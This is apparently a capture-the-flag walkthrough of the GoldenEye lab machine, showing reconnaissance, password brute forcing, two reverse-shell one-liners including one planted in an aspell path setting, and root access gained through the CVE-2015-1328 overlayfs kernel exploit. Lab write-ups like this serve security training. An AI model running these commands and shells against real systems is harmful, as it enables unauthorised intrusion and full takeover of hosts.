[*]
1. find host: nmap -sn 172.16.16.0/24
MAC Address: 08:00:27:9B:DA:D7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 172.16.16.44
Host is up (0.00027s latency).
[*]
2. Generic scan: nmap 172.16.16.44
Not shown: 998 closed ports
PORT   STATE SERVICE
25/tcp open  smtp
80/tcp open  http
[*]
3. Service scan: nmap 172.16.16.44 -A -sV -p 25,80
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
|_ssl-date: TLS randomness does not represent time
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 08:00:27:D5:65:0B (Oracle VirtualBox virtual NIC)
[*]
4. Webserver scanning:
root@hostmachine:~# nikto -h 172.16.16.44
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          172.16.16.44
+ Target Hostname:    172.16.16.44
+ Target Port:        80
+ Start Time:         2020-06-14 19:30:44 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: fc, size: 56aba821be9ed, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD 
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.24
+ /splashAdmin.php: Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7889 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-06-14 19:31:32 (GMT-5) (48 seconds)
[*]
5. Found possible vulns
root@hostmachine:~# searchsploit "Cobalt Qube"
------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                |  Path
------------------------------------------------------------------------------ ---------------------------------
Cobalt Qube 3.0 - Authentication Bypass                                       | php/webapps/21640.txt
Cobalt Qube Webmail 1.0 - Directory Traversal                                 | php/webapps/20995.txt
[*]
6. Attempted exploit for CobaltQute 3.0, but no luck
[*]
7. Found artifact in terminal.js
view-source:http://172.16.16.44/terminal.js
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
[*]
8. Using cyber chef (from html) I was able to decode the password:
InvincibleHack3r
[*]
9. Login to /sev-login and login as boris
[*]
10. Found artifact
Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port
[*]
11. I used a quick script to scan all ports in under 10sec
from multiprocessing import Pool
import socket
def scan(x):
  try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('172.16.16.44', x))
    print(x)
  except:
    pass
ports = tuple( range(1, 65536) )
pool = Pool(4)
pool.map(scan, ports)

*output*
25
80
55006
55007
[*]
12. Enumerate ports:

PORT      STATE SERVICE     VERSION
55006/tcp open  ssl/unknown
|_ssl-date: TLS randomness does not represent time
55007/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP RESP-CODES STLS SASL(PLAIN) AUTH-RESP-CODE USER UIDL PIPELINING CAPA
|_ssl-date: TLS randomness does not represent time

[*]
13. VRFY is set for SMTP, so I'm going to make a user list from splashAdmin.php
cewl -d 2 -m 4 http://172.16.16.44/splashAdmin.php -w gold_users.txt
[*]
14. Used python script to add lowercase words to user list:
with open('gold_users.txt', 'r') as f:
  file = f.read()
  file = file.splitlines()
for u in file:
  if u.lower() not in file:
    file.append(u.lower())
with open('gold_users.txt', 'w') as f:
  f.write('\n'.join(str(v) for v in file))
[*]
15. Used a 'vrfy' script to check mail server against known users // user enumeration
252 2.0.0 Boris
252 2.0.0 Natalya
252 2.0.0 boris
252 2.0.0 natalya
252 2.0.0 root
[*]
16. Quick bruteforce: hydra -L users.txt -P /usr/share/wordlists/fasttrack.txt -s 55007 pop3://172.16.16.44
users.txt:
boris
natalya
root

[STATUS] 80.00 tries/min, 80 tries in 00:01h, 586 to do in 00:08h, 16 active
[55007][pop3] host: 172.16.16.44   login: boris   password: secret1!
[STATUS] 79.67 tries/min, 239 tries in 00:03h, 427 to do in 00:06h, 16 active
[55007][pop3] host: 172.16.16.44   login: natalya   password: bird
[*]
17. Enumerate boris
From: root@127.0.0.1.goldeneye

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.

Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.

[*]
18. Enumerate nalalya:
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.

[*]
19. Login as xenia at severnaya-station.com/gnocertdir
[*]
20. I saw an upload option under profile. I tried to upload a webshell
http://severnaya-station.com/gnocertdir/user/files.php
[*]
21. The files don't get evaluated as PHP, so the webshell wasn't successful

[*]
22. Found message from 'doak'
As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.

My email username is...

doak

Thank you,

Cheers,

Dr. Doak "The Doctor"
Training Scientist - Sr Level Training Operating Supervisor
GoldenEye Operations Center Sector
Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@
Please Recycle before you print, Stay Green aka save the company money!
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.
[*]
23. Bruteforce doak's email: hydra -l doak -P /usr/share/wordlists/fasttrack.txt pop3://172.16.16.44 -s 55007
[STATUS] 72.00 tries/min, 144 tries in 00:02h, 78 to do in 00:02h, 16 active

[55007][pop3] host: 172.16.16.44   login: doak   password: goat
[*]
24. Enumerate doak
From: doak@ubuntu

James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?

Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......

username: dr_doak
password: 4England!

25. Login as dr_doak (on the training portal)

26. Found artifact in dr_doak's files
007,

I was able to capture this apps adm1n cr3ds through clear txt. 

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here. 

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.

27. Found artifact in image:
JFIF
Exif
eFdpbnRlcjE5OTV4IQ==
GoldenEye
linux
For James
0231
0100
ASCII
For 007
""""""""""
             !      !!!   !!!!!!!!"""""""""""""""

28. base64 decode string: xWinter1995x!

29. Login as admin (in training portal)

30. After alot of digging, I found a shell script 'path to aspell'
sh -c '(sleep 4062|telnet 192.168.230.132 4444|while : ; do sh && break; done 2>&1|telnet 192.168.230.132 4444 >/dev/null 2>&1 &)'

To use spell-checking within the editor, you MUST have aspell 0.50 or later installed on your server, and you must specify the correct path to access the aspell binary. On Unix/Linux systems, this path is usually /usr/bin/aspell, but it might be something else.

31. Modified this to be a reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.16.43", 443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'


32. Kick off rev shell by using spellcheck **change default spellchecker to PSpellcheck**

http://severnaya-station.com/gnocertdir/mod/forum/post.php?forum=1

33. In rev-shell, I copied over linux-priv-checker, and it suggested exploiting the vuln for the Kernel version "OFS"
CVE 2015-1328

34. I copied over the .c file, and the execution failed because "gcc was not found"
I modified the system command to cc instead, and it worked
**OLD** lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
**NEW** lib = system("cc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");

chmod u+x ofs
www-data@ubuntu:/var/www/moodledata$ ./ofs
./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# 


35. Capture flag:
Alec told me to place the codes here: 

568628e0d993b1973adc718237da6e93

If you captured this make sure to go here.....
/006-final/xvf7-flag/


36. Extra little gem at
http://severnaya-station.com//006-final/xvf7-flag/


